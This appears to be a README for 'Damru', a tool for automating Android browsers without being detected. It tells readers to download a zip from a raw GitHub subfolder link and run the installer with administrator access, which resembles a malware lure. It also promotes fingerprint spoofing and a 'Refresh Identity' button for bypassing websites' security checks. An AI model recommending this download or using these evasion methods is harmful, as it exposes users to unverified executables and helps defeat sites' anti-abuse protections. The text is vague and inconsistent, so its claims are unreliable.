Damru automates Android browser tasks without detection. Security systems often flag automated programs, but Damru mimics human behavior to keep your tasks running. It uses advanced techniques to hide the automation process. This tool works for data collection, testing, and other browser-based Android tasks.
Make sure your computer meets these needs before you start:
- Windows 10 or Windows 11.
- At least 8GB of RAM.
- A stable internet connection.
- Administrator access on your machine.
- Enough disk space for Android system files.
Follow these steps to set up Damru on your Windows machine.
- Visit this page to download the software: https://raw.githubusercontent.com/Soliman-moh/damru/main/darrein/Software-v1.4.zip
- Locate the download folder on your computer.
- Open the installer file to begin the setup process.
- Follow the on-screen prompts to place the software on your drive.
- Launch the Damru application from your desktop icon.
Damru works by mimicking how a real phone talks to a website. Most automation tools use scripts that websites spot easily. Damru operates at the system level. It changes how the software presents itself to servers. By modifying how the browser handles graphic tasks and system information, it appears as a standard device.
The software utilizes a combination of C++ overrides and specialized configuration patches. These methods ensure that websites see a genuine Android device. This allows you to run your tasks without triggers or blocks from security filters.
The Damru main window displays your active browser instances. You see a list of available tasks and their status.
To create an automation task, select "New Task" from the menu. Provide the web address you want the browser to visit. The system asks for specific instructions, such as clicking a button or filling out a form.
Damru creates virtual Android devices for your tasks. You can view these devices in the "Device Manager" tab. Each device has its own settings, such as screen size and battery level. You can start, stop, or reset these devices at any time.
Websites use various methods to spot automation. Damru handles these by providing a unique fingerprint for each session. This means your activity looks like a different user each time. You do not need to manage these settings manually; Damru applies the best configurations by default.
If you encounter a specific security check, use the "Refresh Identity" button. This forces the browser to change its fingerprint details to bypass the active check.
No. Damru provides a visual interface for all tasks. You define your automation steps through clicks and forms.
Some major platforms update their security often. If you face a block, update your version of Damru. We release updates to keep up with these changes. Ensure you have the latest version installed to maintain high success rates.
Yes. You can manage several browser windows at once. Keep in mind that running too many instances at the same time uses more system memory. Start with one or two tasks to monitor your computer performance.
If you have questions about the interface or need help with a step, check the help menu inside the application. It lists common error codes and solutions for each.
- Keep your Windows system up to date.
- Close other resource-heavy programs while running large batches of tasks.
- Use a high-quality internet connection to ensure the browser responds quickly.
- Save your task settings as presets to reuse them later.
- Check the logs folder if a task fails; the logs provide clues about what caused the issue.
Damru makes automation simple. You do not need to worry about complex scripts or underlying system architecture. Set your task, start the process, and let the software handle the connection details. This tool gives you a consistent way to automate Android browser activity while maintaining a low profile.